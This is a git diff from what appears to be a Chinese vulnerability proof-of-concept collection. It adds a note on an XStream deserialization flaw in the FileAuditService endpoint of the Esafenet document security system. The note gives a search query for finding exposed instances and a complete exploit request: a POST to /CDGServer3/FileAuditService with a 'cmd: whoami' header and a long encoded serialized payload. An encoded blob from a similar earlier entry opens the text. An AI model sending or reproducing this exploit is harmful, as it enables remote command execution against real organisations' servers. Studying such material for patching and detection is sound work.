IKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706603842893-f6b4f8d3-7658-430d-a752-eadf34f3fb36.png](./img/dO2u_IB_Mn-UFxxN/1706603842893-f6b4f8d3-7658-430d-a752-eadf34f3fb36-300440.png)
+
+
+
+> 更新: 2024-04-20 22:01:34  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/axqk1fycl9lfr028>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统FileAuditService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统FileAuditService存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..68c8c5a
--- /dev/null
+++ b/亿赛通电子文档安全管理系统FileAuditService存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统FileAuditService存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统FileAuditService存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/yTQ58mMqQbk7Uyqu/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-686953.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/FileAuditService HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMC